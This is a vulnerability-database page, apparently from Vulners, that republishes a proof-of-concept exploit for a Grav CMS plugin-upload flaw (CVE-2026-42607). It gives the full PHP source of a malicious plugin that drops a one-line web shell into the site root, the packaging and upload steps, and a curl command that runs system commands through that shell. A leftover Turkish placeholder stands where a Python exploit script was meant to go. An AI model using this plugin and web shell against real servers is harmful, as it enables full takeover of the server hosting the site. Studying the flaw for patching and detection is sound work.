Vulners
Lucene search
Grav CMS 2.0.0-beta.2 - Remote Code Execution
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2026-42607 | 27 Apr 202612:14 | – | circl |
 | Grav 代码注入漏洞 | 11 May 202600:00 | – | cnnvd |
 | CVE-2026-42607 | 11 May 202614:58 | – | cve |
 | CVE-2026-42607 Grav: Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 11 May 202614:58 | – | cvelist |
 | Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 202621:21 | – | github |
 | CVE-2026-42607 | 11 May 202616:17 | – | nvd |
 | GHSA-W48R-JPPP-RCFW Grav Vulnerable to Remote Code Execution (RCE) via Malicious Plugin ZIP Upload in Direct Install Feature | 5 May 202621:21 | – | osv |
 | 📄 Grav CMS Shell Upload | 29 May 202600:00 | – | packetstorm |
| 📄 Grav CMS Remote Code Execution | 17 Jun 202600:00 | – | packetstorm |
| 📄 Grav CMS Zip Slip Remote Code Execution | 18 Jun 202600:00 | – | packetstorm |
10
# Exploit Title: Grav CMS < 2.0.0-beta.2 - Remote Code Execution (RCE)
# Date: 2026-05-08
# Exploit Author: Mustafa Murat Akgül
# Vendor Homepage: https://getgrav.org/
# Software Link: https://github.com/getgrav/grav
# Version: < 2.0.0-beta.2
# CVE: CVE-2026-42607 / GHSA-w48r-jppp-rcfw
# Tested on: Linux/Ubuntu (Grav Admin Plugin Enabled)
Technical Details:
The Grav CMS "Direct Install" feature in the Admin plugin allows administrators
to upload plugins as ZIP files. The system failed to adequately validate the
contents of the ZIP archive or prevent path traversal (Zip Slip) during extraction.
By crafting a malicious plugin that hooks into Grav events (e.g., onPluginsInitialized),
an attacker can execute arbitrary PHP code or drop a persistent web shell on the root directory.
Proof of Concept (PoC):
1. Create a malicious plugin structure:
- shellplugin/blueprints.yaml
- shellplugin/shellplugin.yaml
- shellplugin/shellplugin.php (Payload below)
--- shellplugin.php ---
<?php
namespace Grav\Plugin;
use Grav\Common\Plugin;
class ShellpluginPlugin extends Plugin {
public static function getSubscribedEvents(): array {
return ['onPluginsInitialized' => ['onPluginsInitialized', 0]];
}
public function onPluginsInitialized(): void {
$shell_path = GRAV_ROOT . '/shell.php';
if (!file_exists($shell_path)) {
file_put_contents($shell_path, '<?php system($_GET["cmd"]); ?>');
}
}
}
----------------------
2. Compress the directory:
$ zip -r shellplugin.zip shellplugin/
3. Log in to the Grav Admin panel and navigate to:
/admin/tools/direct-install
4. Upload the 'shellplugin.zip' file.
5. Once installed, the plugin triggers on the next request to the site,
dropping a shell at the root.
6. Access your shell:
curl "http://<target>/shell.php?cmd=id"
Exploit Script (Python):
[Buraya yukarıda paylaştığın Python scriptini ekleyebilirsin]
Impact:
Full system-level access under the context of the web server user. An attacker
with administrative privileges (or via CSRF) can compromise the entire server.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
26 May 2026 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.19.1
EPSS0.03934
SSVC